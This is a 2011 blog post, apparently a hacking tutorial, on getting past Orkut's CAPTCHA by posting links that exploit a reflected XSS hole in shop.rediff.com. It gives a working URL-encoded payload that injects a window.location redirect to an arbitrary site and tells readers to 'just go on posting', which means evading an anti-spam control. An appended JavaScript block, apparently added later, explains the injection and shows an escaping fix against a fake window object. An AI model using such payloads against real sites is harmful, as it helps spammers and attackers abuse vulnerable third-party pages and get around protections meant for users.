Saturday, July 16, 2011

Using XSS vulnerability to bypass captcha of Orkut


This post walks you through bypassing the CAPTCHA on orkut.com using an XSS vulnerability present in rediff.com.
For background on XSS vulnerabilities, you may go through my basic XSS tutorial.



What is CAPTCHA?

Completely Automated Public Turing test to tell Computers and Humans Apart: used to decide whether a program or online service is being operated by a human or a machine user. It is an image displaying a message along with lines or shades that make it hard for a computer to do character recognition.

What is the use of CAPTCHA?

To prevent accounts from being created by programs or spiders.

The ultimate objective is to reduce spam.


OK, how to use XSS in rediff to bypass the CAPTCHA in Orkut?
Orkut asks for a CAPTCHA every time an external link is sent through a scrap or community post, unless the link is from an affiliated site. So this hack sends external links without any CAPTCHA.

1. Here we'll use XSS for redirection to our desired link.

2. The hack depends on rediff.com, as the site is coded with little security and XSS holes are left in each and every page.

3. Since Orkut allows rediff links to be posted without a CAPTCHA, we can use that for our purpose.

Take a look at the link given below:

http://shop.rediff.com/shop/searchv3_gall.jsp?Query=%22%3Bwindow%0A.location%3D%27http%3A//[YOUR SITE HERE]%27%3B%22

Example:

http://shop.rediff.com/shop/searchv3_gall.jsp?Query=%22%3Bwindow%0A.location%3D%27http%3A//google.com%27%3B%22

The link given above takes us to google.com.

So, just go on posting...

The link does open the rediff page for 1 second before redirecting to your page.
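Why the example link redirects, and what the fix looks like on the vulnerable site's side, as an added example that is not part of the original post or rediff's code. It assumes the search page pastes the decoded `Query` value into a double-quoted JavaScript string; the template and the names `renderUnsafe`, `renderSafe`, `jsStringEscape` and `runInFakePage` are hypothetical, and both renderings are evaluated against a fake `window` object.

```javascript
// Constructed sample: the Query value from the post's google.com example, still URL-encoded.
const SAMPLE_QUERY = "%22%3Bwindow%0A.location%3D%27http%3A//google.com%27%3B%22";
const START_URL = "https://shop.example/search"; // placeholder for the page being viewed

// Assumed vulnerable template (hypothetical, the real page source is not in the post):
// the decoded parameter is pasted straight into a double-quoted JavaScript string.
function renderUnsafe(query) {
  return 'var searchTerm = "' + query + '";';
}

// Hardened form: every character outside [A-Za-z0-9 ] becomes \uXXXX, so the value
// cannot close the string literal or start a new statement.
function jsStringEscape(value) {
  let out = "";
  for (let i = 0; i < value.length; i++) {
    const ch = value[i];
    out += /[A-Za-z0-9 ]/.test(ch)
      ? ch
      : "\\u" + value.charCodeAt(i).toString(16).padStart(4, "0");
  }
  return out;
}

function renderSafe(query) {
  return 'var searchTerm = "' + jsStringEscape(query) + '";';
}

// Evaluate a rendered script against a fake window object (no browser, no network)
// and report what the page variable and window.location ended up as.
function runInFakePage(script) {
  const fakeWindow = { location: START_URL };
  const run = new Function("window", script + "\nreturn searchTerm;");
  const searchTerm = run(fakeWindow);
  return { searchTerm, location: fakeWindow.location };
}

const decoded = decodeURIComponent(SAMPLE_QUERY);
console.log("unsafe:", runInFakePage(renderUnsafe(decoded)));
console.log("safe:  ", runInFakePage(renderSafe(decoded)));
```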
